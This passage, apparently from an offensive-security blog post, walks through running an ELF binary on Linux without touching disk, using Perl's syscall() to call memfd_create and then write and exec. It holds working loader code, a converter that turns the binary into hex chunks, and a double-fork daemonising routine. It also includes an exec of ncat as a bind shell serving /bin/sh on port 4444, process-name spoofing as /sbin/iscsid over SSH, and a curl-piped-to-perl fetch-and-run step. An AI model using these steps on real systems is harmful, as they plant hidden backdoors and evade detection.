Much like a memory-backed fd = open(name, O_CREAT|O_RDWR, 0700), we’ll use the memfd_create(2) system call to make our anonymous file. We’ll pass it the MFD_CLOEXEC flag (analogous to O_CLOEXEC), so that the file descriptor we get will be automatically closed when we execve(2) the ELF binary.

Because we’re using Perl’s syscall() to call the memfd_create(2), we don’t have easy access to a user-friendly libc wrapper function or, for that matter, a nice human-readable MFD_CLOEXEC constant. Instead, we’ll need to pass syscall() the raw system call number for memfd_create(2) and the numeric constant for MEMFD_CLOEXEC. Both of these are found in header files in /usr/include. System call numbers are stored in #defines starting with __NR_.

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:/usr/include$ egrep -r '__NR_memfd_create|MFD_CLOEXEC' *
asm-generic/unistd.h:#define __NR_memfd_create 279
asm-generic/unistd.h:__SYSCALL(__NR_memfd_create, sys_memfd_create)
linux/memfd.h:#define MFD_CLOEXEC               0x0001U
x86_64-linux-gnu/asm/unistd_64.h:#define __NR_memfd_create 319
x86_64-linux-gnu/asm/unistd_32.h:#define __NR_memfd_create 356
x86_64-linux-gnu/asm/unistd_x32.h:#define __NR_memfd_create (__X32_SYSCALL_BIT + 319)
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create
x86_64-linux-gnu/bits/syscall.h:#define SYS_memfd_create __NR_memfd_create

Looks like memfd_create(2) is system call number 319 on 64-bit Linux (#define __NR_memfd_create in a file with a name ending in _64.h), and MFD_CLOEXEC is a consatnt 0x0001U (i.e. 1, in linux/memfd.h). Now that we’ve got the numbers we need, we’re almost ready to do the Perl equivalent of C’s fd = memfd_create(name, MFD_CLOEXEC) (or more specifically, fd = syscall(319, name, MFD_CLOEXEC)).

The last thing we need is a name for our file. In a file listing, /memfd: is probably a bit better-looking than /memfd:kittens, so we’ll pass an empty string to memfd_create(2) via syscall(). Perl’s syscall() won’t take string literals (due to passing a pointer under the hood), so we make a variable with the empty string and use it instead.

Putting it together, let’s finally make our anonymous file:

my $name = "";
my $fd = syscall(319, $name, 1);
if (-1 == $fd) {
        die "memfd_create: $!";
}

We now have a file descriptor number in $fd. We can wrap that up in a Perl one-liner which lists its own file descriptors after making the anonymous file:

stuart@ubuntu-s-1vcpu-1gb-nyc1-01:~$ perl -e '$n="";die$!if-1==syscall(319,$n,1);print`ls -l /proc/$$/fd`'
total 0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 0 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 1 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 2 -> /dev/pts/0
lrwx------ 1 stuart stuart 64 Mar 31 02:44 3 -> /memfd: (deleted)

write(2)

Now that we have an anonymous file, we need to fill it with ELF data. First we’ll need to get a Perl filehandle from a file descriptor, then we’ll need to get our data in a format that can be written, and finally, we’ll write it.

Perl’s open(), which is normally used to open files, can also be used to turn an already-open file descriptor into a file handle by specifying something like >&=X (where X is a file descriptor) instead of a file name. We’ll also want to enable autoflush on the new file handle:

open(my $FH, '>&='.$fd) or die "open: $!";
select((select($FH), $|=1)[0]);

We now have a file handle which refers to our anonymous file.

Next we need to make our binary available to Perl, so we can write it to the anonymous file. We’ll turn the binary into a bunch of Perl print statements of which each write a chunk of our binary to the anonymous file.

perl -e '$/=\32;print"print \$FH pack q/H*/, q/".(unpack"H*")."/\ or die qq/write: \$!/;\n"while(<>)' ./elfbinary

This will give us many, many lines similar to:

print $FH pack q/H*/, q/7f454c4602010100000000000000000002003e0001000000304f450000000000/ or die qq/write: $!/;
print $FH pack q/H*/, q/4000000000000000c80100000000000000000000400038000700400017000300/ or die qq/write: $!/;
print $FH pack q/H*/, q/0600000004000000400000000000000040004000000000004000400000000000/ or die qq/write: $!/;

Exceuting those puts our ELF binary into memory. Time to run it.

Optional: fork(2)

Ok, fork(2) is isn’t actually a system call; it’s really a libc function which does all sorts of stuff under the hood. Perl’s fork() is functionally identical to libc’s as far as process-making goes: once it’s called, there are now two nearly identical processes running (of which one, usually the child, often finds itself calling exec(2)). We don’t actually have to spawn a new process to run our ELF binary, but if we want to do more than just run it and exit (say, run it multiple times), it’s the way to go. In general, using fork() to spawn multiple children looks something like:

while ($keep_going) {
        my $pid = fork();
        if (-1 == $pid) { # Error
                die "fork: $!";
        }
        if (0 == $pid) { # Child
                # Do child things here
                exit 0;
        }
}

Another handy use of fork(), especially when done twice with a call to setsid(2) in the middle, is to spawn a disassociated child and let the parent terminate:

# Spawn child
my $pid = fork();
if (-1 == $pid) { # Error
        die "fork1: $!";
}
if (0 != $pid) { # Parent terminates
        exit 0;
}
# In the child, become session leader
if (-1 == syscall(112)) {
        die "setsid: $!";
}

# Spawn grandchild
$pid = fork();
if (-1 == $pid) { # Error
        die "fork2: $!";
}
if (0 != $pid) { # Child terminates
        exit 0;
}
# In the grandchild here, do grandchild things

We can now have our ELF process run multiple times or in a separate process. Let’s do it.

execve(2)

Linux process creation is a funny thing. Ever since the early days of Unix, process creation has been a combination of not much more than duplicating a current process and swapping out the new clone’s program with what should be running, and on Linux it’s no different. The execve(2) system call does the second bit: it changes one running program into another. Perl gives us exec(), which does more or less the same, albiet with easier syntax.

We pass to exec() two things: the file containing the program to execute (i.e. our in-memory ELF binary) and a list of arguments, of which the first element is usually taken as the process name. Usually, the file and the process name are the same, but since it’d look bad to have /proc/<PID>/fd/3 in a process listing, we’ll name our process something else.

The syntax for calling exec() is a bit odd, and explained much better in the documentation. For now, we’ll take it on faith that the file is passed as a string in curly braces and there follows a comma-separated list of process arguments. We can use the variable $$ to get the pid of our own Perl process. For the sake of clarity, the following assumes we’ve put ncat in memory, but in practice, it’s better to use something which takes arguments that don’t look like a backdoor.

exec {"/proc/$$/fd/$fd"} "kittens", "-kvl", "4444", "-e", "/bin/sh" or die "exec: $!";

The new process won’t have the anonymous file open as a symlink in /proc/<PID>/fd, but the anonymous file will be visible as the/proc/<PID>/exe symlink, which normally points to the file containing the program which is being executed by the process.

We’ve now got an ELF binary running without putting anything on disk or even in the filesystem.

Scripting it

It’s not likely we’ll have the luxury of being able to sit on target and do all of the above by hand. Instead, we’ll pipe the script (elfload.pl in the example below) via SSH to Perl’s stdin, and use a bit of shell trickery to keep perl with no arguments from showing up in the process list:

cat ./elfload.pl | ssh user@target /bin/bash -c '"exec -a /sbin/iscsid perl"'

This will run Perl, renamed in the process list to /sbin/iscsid with no arguments. When not given a script or a bit of code with -e, Perl expects a script on stdin, so we send the script to perl stdin via our local SSH client. The end result is our script is run without touching disk at all.

Without creds but with access to the target (i.e. after exploiting on), in most cases we can probably use the devopsy curl http://server/elfload.pl | perl trick (or intercept someone doing the trick for us). As long as the script makes it to Perl’s stdin and Perl gets an EOF when the script’s all read, it doesn’t particularly matter how it gets there.

Artifacts

Once running, the only real difference between a program running from an anonymous file and a program running from a normal file is the /proc/<PID>/exe symlink.

If something’s monitoring system calls (e.g. someone’s running strace -f on sshd), the memfd_create(2) calls will stick out, as will passing paths in /proc/<PID>/fd to execve(2).

Other than that, there’s very little evidence anything is wrong.

Demo

To see this in action, have a look at this asciicast. asciicast

In C (translate to your non-disk-touching language of choice):

  1. fd = memfd_create("", MFD_CLOEXEC);
  2. write(pid, elfbuffer, elfbuffer_len);
  3. asprintf(p, "/proc/self/fd/%i", fd); execl(p, "kittens", "arg1", "arg2", NULL);